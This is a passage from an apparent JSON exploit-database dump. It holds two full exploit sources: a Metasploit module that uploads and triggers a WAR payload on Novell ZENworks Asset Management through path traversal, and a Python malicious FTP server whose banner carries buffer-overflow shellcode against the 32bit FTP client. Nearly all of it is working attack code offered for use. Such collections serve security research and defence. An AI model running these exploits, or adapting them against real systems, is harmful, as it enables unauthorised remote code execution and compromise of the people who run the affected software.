end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_cooltype_sing.rb"}], "zdt": [{"lastseen": "2018-03-09T16:10:03", "bulletinFamily": "exploit", "description": "Exploit for java platform in category remote exploits", "modified": "2012-08-14T00:00:00", "published": "2012-08-14T00:00:00", "id": "1337DAY-ID-19184", "href": "https://0day.today/exploit/description/19184", "type": "zdt", "title": "Novell ZENworks Asset Management Remote Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Novell ZENworks Asset Management Remote Execution',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in Novell ZENworks Asset Management\r\n 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file\r\n outside of the MalibuUploadDirectory and then make a secondary request that allows\r\n for arbitrary code execution.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-2653' ],\r\n [ 'OSVDB', '77583' ],\r\n [ 'BID', '50966' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ],\r\n [ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => [ 'java' ],\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 02 2011'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3])\r\n ], self.class )\r\n end\r\n\r\n def exploit\r\n\r\n # Generate the WAR containing the payload\r\n app_base = rand_text_alphanumeric(4+rand(32-4))\r\n jsp_name = rand_text_alphanumeric(8+rand(8))\r\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\r\n\r\n uid = rand_text_alphanumeric(34).to_s\r\n\r\n data = \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"RequestParms\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"language\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"rtyp\\\"\\r\\n\\r\\n\"\r\n data << \"prod\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"sess\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"mode\\\"\\r\\n\\r\\n\"\r\n data << \"newreport\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"dp\\\"\\r\\n\\r\\n\"\r\n data << \"n\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"console\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"oldentry\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"act\\\"\\r\\n\\r\\n\"\r\n data << \"malibu.StartImportPAC\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"saveact\\\"\\r\\n\\r\\n\"\r\n data << \"malibu.StartImportPAC\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"isalert\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"language\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"queryid\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"Locale\\\"\\r\\n\\r\\n\"\r\n data << \"MM/dd/yyyy\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"CurrencySym\\\"\\r\\n\\r\\n\"\r\n data << \"$\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"CurrencyPos\\\"\\r\\n\\r\\n\"\r\n data << \"start\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"ThousandsSep\\\"\\r\\n\\r\\n\"\r\n data << \",\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"CurDecimalPt\\\"\\r\\n\\r\\n\"\r\n data << \".\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"MinusSign\\\"\\r\\n\\r\\n\"\r\n data << \"-\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"sum\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"grp\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"col\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"PreLoadRight\\\"\\r\\n\\r\\n\"\r\n data << \"yes\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"console\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"uploadFile\\\"; filename=\\\"/#{\"../\" * datastore['DEPTH']}#{app_base}.war\\x00.txt\\\"\\r\\n\"\r\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\r\n data << war_data\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"SuccessPage\\\"\\r\\n\\r\\n\"\r\n data << \"Html/UploadSuccess.html\\r\\n\"\r\n data << \"------#{uid}--\\r\\n\"\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/rtrlet/catch\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=----#{uid}\",\r\n 'data' => data,\r\n })\r\n\r\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\r\n\r\n select(nil, nil, nil, 10)\r\n\r\n if (res.code == 500)\r\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\r\n send_request_raw(\r\n {\r\n 'uri' => \"/#{app_base}/\" + \"#{jsp_name}\" + '.jsp',\r\n 'method' => 'GET',\r\n })\r\n else\r\n print_error(\"WAR upload failed...\")\r\n end\r\n\r\n end\r\n\r\nend\r\n\r\n\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19184"}, {"lastseen": "2018-03-19T01:59:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2009-05-05T00:00:00", "published": "2009-05-05T00:00:00", "id": "1337DAY-ID-9443", "href": "https://0day.today/exploit/description/9443", "type": "zdt", "title": "32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit", "sourceData": "============================================================\r\n32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/python\r\n# _ _ _ __ _ _ _ \r\n#| || | (_) ___ / \\ | |__ | | | \r\n#| __ | | | (_-< | () | | / / |_ _|\r\n#|_||_| |_| /__/ \\__/ |_\\_\\ |_| \r\n#\r\n#[*] Bug : 32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit\r\n#[*] Founder : Load 99%\r\n#[*] Tested on : Xp sp3 (EN)(VB)\r\n#[*] Exploited by : His0k4\r\n#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com\r\n#[*] Serra7 Merra7 koulchi mderra7 :p\r\n\r\nfrom socket import *\r\n\r\npayload = \"\\x41\"*989\r\npayload += \"\\x67\\x86\\x86\\x7C\" # jmp esp kernerl32.dll\r\n\r\n # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com\r\npayload += (\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x54\\x4e\\x53\\x4b\\x38\\x4e\\x47\"\r\n\"\\x45\\x30\\x4a\\x37\\x41\\x50\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x31\\x4b\\x58\"\r\n\"\\x4f\\x45\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x43\\x4b\\x38\"\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\r\n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\n\"\\x46\\x4f\\x4b\\x33\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58\"\r\n\"\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x48\\x4e\\x50\\x4b\\x54\"\r\n\"\\x4b\\x38\\x4f\\x35\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x58\"\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x35\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43\"\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x43\\x45\\x48\\x42\\x4c\\x4a\\x47\"\r\n\"\\x4e\\x50\\x4b\\x48\\x42\\x34\\x4e\\x30\\x4b\\x48\\x42\\x47\\x4e\\x51\\x4d\\x4a\"\r\n\"\\x4b\\x38\\x4a\\x46\\x4a\\x30\\x4b\\x4e\\x49\\x30\\x4b\\x58\\x42\\x38\\x42\\x4b\"\r\n\"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x48\\x4a\\x36\\x4e\\x53\\x4f\\x55\\x41\\x43\"\r\n\"\\x48\\x4f\\x42\\x46\\x48\\x55\\x49\\x58\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\"\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x59\"\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\"\r\n\"\\x4e\\x56\\x43\\x36\\x42\\x30\\x5a\")\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.bind((\"0.0.0.0\", 21))\r\ns.listen(1)\r\nprint \"[+] Listening on [FTP] 21\"\r\nc, addr = s.accept()\r\n\r\nprint \"[+] Connection accepted from: %s\" % (addr[0])\r\n\r\nc.send(\"220 \"+payload+\"\\r\\n\")\r\nc.recv(1024)\r\nc.close()\r\nraw_input(\"[+] Done, press enter to quit\")\r\ns.close()\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9443"}]}
